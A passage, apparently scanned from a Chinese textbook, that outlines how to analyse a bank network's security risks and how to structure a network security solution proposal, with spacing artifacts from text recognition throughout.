主要 是 指 当 网 络 系 统 中 的 网 页 ,文件 数据库、 网 络 和 系统 等 遇 到 意外 破坏 时 ,可 以 采用 迅速 
恢复 技术 。 

(6) 优质 的 安全 管理 服务 (Management)。 优 质 的 安全 管理 服务 是 安全 解决 方案 中 的 
M, 主 要 是 指 在 安全 项 目 中 ,安全 管理 是 项 目 有 效 实施 过 程 中 的 重要 保证 。 





有 3 安全 风险 分 析 内 容 


安全 风险 分 析 主 要 包括 对 网 络 物理 结构 、 网 络 系 统 和 实际 应 用 进行 的 各 种 安全 风险 和 
隐患 的 具体 分 析 。 

1) 现 有 网 络 物理 结构 安全 分 析 

现 有 网 络 物理 结构 安全 分 析 ,主要 是 详细 具体 地 分 析 该 银行 与 各 分 行 的 网 络 结构 ,包括 
内 部 网 .外 部 网 和 远程 网 的 物理 结构 。 

2) 网 络 系统 安全 分 析 

网 络 系统 安全 分 析 ,主要 是 详细 分 析 该 银行 与 各 分 行 网 络 的 实际 连接 ,操作 系统 的 使 用 
和 维护 情况 .Internet 的 浏览 访问 使 用 情况 .桌面 系统 的 使 用 情况 和 主机 系统 的 使 用 情况 , 找 
出 可 能 存在 的 安全 风险 和 隐患 。 

3) 网 络 应 用 的 安全 分 析 

网 络 应 用 的 安全 分 析 主 要 是 详细 分 析 该 银行 与 各 分 行 的 所 有 服务 系统 及 应 用 系统 , 找 
出 可 能 存在 的 安全 风险 。 


有 4. 网 络 安全 解决 方案 设计 


设计 示例 如 下 。 

(1) 公司 技术 实力 介绍 

(2) 公司 人 员 结 构 情 况 

XX 网 络 公 司 现 有 管理 人 员 现 状 分 析 。 
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(3) 成 功 的 典型 案例 

主要 介绍 公司 历年 的 主要 安全 工程 的 成 功 案例 ,特别 是 要 指出 与 企 事 业 用 户 项 目 相 近 
的 重大 安全 工程 项 目 , 可 使 用 户 确信 公司 的 工程 经 验 和 可 信和 度 。 

(4) 产品 的 许可 证 或 服务 的 认证 

安全 产品 的 许可 证 ,是 必 不 可 少 的 资料 ,在 国内 只 有 取得 了 许可 证 的 安全 产品 , 才 允 许 
在 国内 销售 和 使 用 。 现 在 网 络 安全 工程 项 目 属于 提供 服务 的 公司 ,通过 国际 认证 可 以 有 利 
于 得 到 良好 的 信誉 。 

(5) 实施 网 络 安全 意义 

实施 网 络 安 全 意义 部 分 主要 着 重 结 合 当 前 的 安全 风险 和 威胁 来 分 析 , 写 出 安全 工程 项 
目 实施 完成 以 后 , 企 事业 用 户 的 网 络 系统 的 信息 安全 能 够 达到 一 个 具体 怎样 的 安全 保护 标 
准 、 防 范 能 力 水 平和 解决 信息 安全 的 重要 性 。 
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